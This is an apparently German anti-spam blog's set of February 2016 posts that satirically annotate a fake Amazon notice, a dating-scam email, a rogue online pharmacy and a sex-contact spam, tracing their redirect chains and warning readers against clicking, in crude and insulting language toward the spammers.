Selbst, wenn man sich einmal unsicher ist, sollte eine E-Mail niemals ein Grund zu panischem Geklicke werden, denn Kriminelle verstehen sich darauf, Menschen zu überrumpeln. Sie leben schließlich davon, dass ihre fiesen Tricks zumindest manchmal funktionieren. Immer vor dem Klick nachdenken. Und im Zweifelsfall einfach rückfragen.

Sobald Sie dies tun, werden Sie Ihr Konto wieder verwenden, um Produkte auf Amazon Europa zu verkaufen!

Freundliche Muller,
Das Amazon Services Team

Freundliche was?

Wenn Sie solche E-Mails nicht mehr erhalten mцchten, kцnnen Sie sich hier abmelden.

Ist ja schon ein bisschen peinlich, wenn man dabei den Link vergisst, nicht?

Aber der Kriminelle hat seine eigentliche „Botschaft“ ja rübergebracht, und jetzt ist er mit seinen Gedanken schon wieder bei den Nutten, so dass die Sorgfalt für eher formale, unwichtige Dinge eben nachlässt. Wenn man darauf achtet, kann man derartige Fehler in sehr vielen Spams sehen. Wenn sich der Spammer Mühe geben wollte, könnte er ja gleich arbeiten gehen.

© 2016 Amazon.com Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten. Amazon Services Europe S.а r.l. 5 Rue Plaetis L-2338 Luxembourg, Handelsregisternummer Luxemburg: B-93815, Gesellschaftskapital 37.500 EUR, Gewerbelizenznummer: 100416, USt.-Identifikationsnummer Luxemburg: LU 19647148.

Nein, diese Spam wurde von einer dynamischen IP-Adresse eines Kunden bei einem Telekommunikationsanbieter aus Arizona, USA versendet; mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen mit Schadsoftware feindselig übernommenen Rechner, der Teil eines Botnetzes ist. Diese Spam hat niemals einen Server von Amazon gesehen.

Einmal ganz davon abgesehen, dass beanspruchtes „geistiges Eigentum“ für eine automatisch erstellte E-Mail ein geistiger Dünnpfiff ist, auf den kaum noch eine Satire möglich ist. Aber das machen leider nicht nur Spammer, sondern auch andere Idioten.

¹Ich weiß, das hier keine Schadsoftware enthalten ist, weil ich mir den Quelltext des angehängten HTML-Dokumentes angeschaut habe. Es gibt keine andere Möglichkeit, das herauszubekommen. Ein Antivirus-Programm versagt regelmäßig, wenn es mit den neuesten Entwicklungen der Kriminellen konfrontiert ist.

Willst Du meine Mus*** anfassen?

Samstag, 13. Februar 2016

Deine was? Deine Muskelrisse vielleicht? Museumsexemplare wirst du ja wohl nicht haben…

Hallo!

Dieser „Name“ passt immer.

Ich habe auf Deinem Profil gesehen […]

Auf welchem Profil? Und wer soll das angelegt haben? Ich pflege es nicht, mich auf irgendwelchen Websites von börsennotierten Unternehmen ohne seriöses Geschäftsmodell¹ so weit datenmäßig zu entblößen, dass…

[…] wir wohnen nur 4 Kilometer auseinander!

…jemand dort herausbekommen könnte, wo ich wohne. Aber hey, du hast ja „mein Profil“ angeguckt und da keinen anderen Namen als „Hallo“ gefunden – da ist jedem sofort klar, dass es eine Lüge ist.

Magst mir nicht ne Freundschaftsanfrage stellen und vorbeikommen?

Ich soll Spammer als „Freunde“ bezeichnen? Hey, du bist…

Ich bin grad echt heiss…

…nicht nur „heiß“, du bist schon komplett hirnverbrannt.

Wir kennen uns ja eh vom sehen her, weißt Du noch wer ich bin?

Was könnte ich mal gesehen haben, was mich an den, die oder das AbsenderIn dieses Bullshits erinnert? Ich muss spontan an eine Mülltonne denken.

Schreib mir schnell, ja?
http://www.m3e2a.club/[ID entfernt]/

Schreib mir schnell, aber keine Mail! Stattdessen klick einfach in eine Spam. Dummes Klicken ist das neue „Schreiben“.

Der Link ist mit einer eindeutigen ID vergiftet. Wer darauf klickt, funkt an die Spammer zurück, dass die Spam ankommt und beklickt wird – das ist ein wirksames Mittel gegen Einsamkeit im Postfach, aber leider nicht so wirksam, wenn man auch etwas Erträgliches in seiner Mail haben möchte. Der Link führt nach der üblichen Kaskade von Weiterleitungen – ein direkter Link ist dem Spammer nun einmal zuwider – in die Website in der Domain myfunbook (punkt) net, wo man die aktuellen Designexperimente der Dating-Betrüger bewundern kann. Natürlich gibt es wieder einmal nur Frauen²:

Ja, eines der von irgendwo aus dem Internet mitgenommenen (und übrigens oft grottenschlecht skalierten) Bilder ist den Verbrechern verloren gegangen. Wie das passieren konnte? Die naheliegendste Erklärung ist: Weil die so sehr damit beschäftigt sind, diese betrügerische Dreckssite von einer Wegwerfdomain in die nächste und von einem Wegwerfserver in den nächsten umzuziehen und das Geld ihrer Opfer im Bordell zu verbraten, haben sie sich natürlich nach dem letzten Umzug noch nicht angeschaut, wie es aussieht. Wenn sie sich Mühe geben würden, könnten sie ja auch arbeiten gehen und brauchten nicht zu spammen.

Was denen, die auf einen solchen Köder hereinfallen, blüht, habe ich schon vor fünf Jahren beschrieben. Es kann gut sein, dass die Methoden inzwischen subtiler sind, aber der Betrug ist der gleiche. Und die Daten, die man auf solchen Seiten eingibt, gehen auch immer noch an richtig üble Verbrecher.

Bis gleich
Hanna

Geh sterben!

Keine Nachrichten mehr von mir?
http://www.m3e2a.club/abm/[ID entfernt]/

Ja, du mich auch!

¹Die Vergällung menschlicher Kommunikation mit Reklame ist kein seriöses Geschäftsmodell und zum Scheitern verurteilt.

²Wegen des klar sexuellen Inhaltes habe ich den Originalgröße-Screenshot bei Flickr als „eingeschränkt“ markiert. Deshalb ist eine Anmeldung an Flickr erforderlich, um ihn zu sehen. Angesichts der geringen Informationsdichte und der dummen Darbietung der Betrugsmasche halte ich diese Einschränkung nicht für einen großen Verlust.

Der Service Ihrer Online Klinik

Donnerstag, 4. Februar 2016

Oh, mit Deppen Leer Zeichen!

Immer wieder erfreulich und erbäulich, wenn sich das Streben nach gestalterischer Exzellenz in der HTML-Formatierung einer Spam mit geistigem Dünnpfiff und sondersamem sprachlichen Ausdruck kombiniert:

Die Links gehen auf die Website in der Domain interstelle (punkt) eu und führen nach diversen Weiterleitungen zu einer Betrugsapotheke in der Domain www (punkt) 121doc (punkt) de, die außerhalb der Europäischen Union in Guernsey verwaltet wird (die weiteren Einzelheiten muss jeder selbst bei der DeNIC herausbekommen, ich darf sie hier wegen der DeNIC-Nutzungsbedingungen nicht posten).

Es ist natürlich eine Spam, also funkt das (technisch ansonsten völlig unnötige) Weiterleitungsskript an die Spammer zurück, auf welchen Mailadressen die Spams ankommen, die beklickt werden. Die Spammer werden mit dieser Information etwas anzufangen wissen, was keinem Empfänger gefällt.

Claim aus dem Titel der Website der Betrugsapotheke: 121doc -- Ihre Online Klinik seit 2002 Aber von diesen Standardanmerkungen einmal abgesehen: Ich muss den Betrugsapothekern widerwillig zugestehen, dass sie in der optischen und psychologischen Präsentation ihres Betruges ordentlich zugelegt haben – wer einen Eindruck davon bekommen möchte, ohne seine Privatsphäre und seine Computersicherheit aufs Spiel zu setzen: Ich habe einen Screenshot der Sektion mit den Pimmelpillen bei Flickr hochgeladen. Hier hat jemand verstanden, was das Wichtigste am Betrug ist: Dass er für seine Opfer seriös aussieht. Es muss ein sehr erfahrener Betrüger sein…

Wer sich von etwas Design und irgendwo abgeschriebenen Worten verblenden lässt und sich nicht an anderen Stellen über diese „Apotheke“ informiert, kann also sehr leicht darauf hereinfallen.

Was von den „Online-Rezepten“ dieser Betrüger zu halten ist, mit denen sie ihre potenziellen Opfer zu verblenden versuchen, lässt sich im Wiki des Antispam e.V. nachlesen. Wer es ernsthaft für möglich hält, dass man bei einer mit asozialer und illegaler Spam beworbenen Betrugsapotheke richtige Medikamente statt lebensgefährlicher Giftpillen bekommt, der sollte gleich den ganzen Artikel dort lesen! Kurz von mir zusammengefasst: Wenn man darauf reingefallen ist und Glück hat, wird gar nichts geliefert und man bleibt wenigstens am Leben, so dass die angegebenen Daten „nur“ für Betrugsgeschäfte aller Art missbraucht werden und man zwei, drei Jahre immer wieder Polizisten, Ermittlungsrichtern, Staatsanwälten und Inkassobüros in nervenaufreibendem Schriftverkehr erklären „darf“, was es damit auf sich hat und wie es dazu gekommen ist. Wer weniger Glück hat, der bekommt „Medikamente“ geliefert und nimmt sie auch noch ein… 🙁

Bekanntschaft für Sex

Mittwoch, 3. Februar 2016

Immer wieder erstaunlich, dass derartige Anbieter ihre Angebote nur mit illegaler und asozialer Spam loswerden – was ich als deutliches Indiz dafür werte, dass man dort vor allem mit Bots chattet, und zwar vermutlich teuer.

Anders, als das – vom Spammer womöglich von irgendwo, zum Beispiel von einer Kampagne für die Nutzung von Kondomen „mitgenommene“ – Bildmaterial vermuten lässt, geht es beim Klick nicht auf eine Website, die irgendwas mit Sexymaus sein will, sondern auf eine Website in der Domain gmgstat (punkt) co (punkt) ua. Dort gibt es keine Mäuschen und keine Körperflüssigkeiten, sondern nur ein Frameset, in dem dann eine Seite aus der Domain alspa (punkt) info eingebettet wird. Diese Seite wiederum…

Screenshot meines Terminals mit der Ausgabe von lynx -mime_header -dump

…enthält nur einen in Javascript gecodeten Zähler (vermutlich hat der Vollidiot von Spammer noch nicht gehört, wie man mit einem grep über die Logdatei des Webservers und einer Pipe auf wc -l an wesentlich aussagekräftigere Zugriffszahlen für diese Drecksseite kommt) sowie eine Weiterleitung auf eine andere Seite in der gleichen Domain. Im nächsten Schritt kommt es dann endlich zur Weiterleitung auf eine Seite in der Domain sexymaus (punkt) com, natürlich mit angehängtem Affiliate-Link, damit der Spammer von den Betreibern der Domain sexymaus (punkt) com auch schön für seine illegale und asoziale Spam bezahlt wird:

Screenshot meines Terminals mit der Ausgabe von lynx -mime_header -dump

Dieser Spammer ist also ganz schön verschroben, wenn er sein eigentliches Geschäft zu verbergen sucht.

Den Betreibern der Domain sexymaus (punkt) com, die im Moment aktiv illegale und asoziale Spamwerbung finanzieren, lege ich nahe, anhand der in den Screenshots sichtbaren Affiliate-IDs ihre Verträge mit diesen Spammern zu beenden und Schadenersatz zu fordern, und zwar wegen der Anwendung illegaler Methoden, der damit verbundenen Beschädigung der Reputation und des Vertrauensbruchs fristlos. So lange sie das nicht tun, sind sie nämlich selbst die Spam. Und wer will schon gern mit Spam chatten?

Ach ja, warum ich das hier schreibe und nicht direkt an die Betreiber?

Ich hätte es wirklich gern an die Betreiber der Website unter sexymaus (punkt) com gemailt, aber leider zeigt mir diese mit illegaler und asozialer Spam beworbene Website ohne aktiviertes Javascript nichts an, so dass ich nicht an ein Impressum kommen kann. Und ich bin doch kein Idiot, dass ich angesichts der gegenwärtigen Kriminalität im Internet einer mit Spam beworbenen Website das Ausführen von Javascript in meinem Browser auf meinem Computer erlaube! Davon würde ich auch jedem anderen abraten.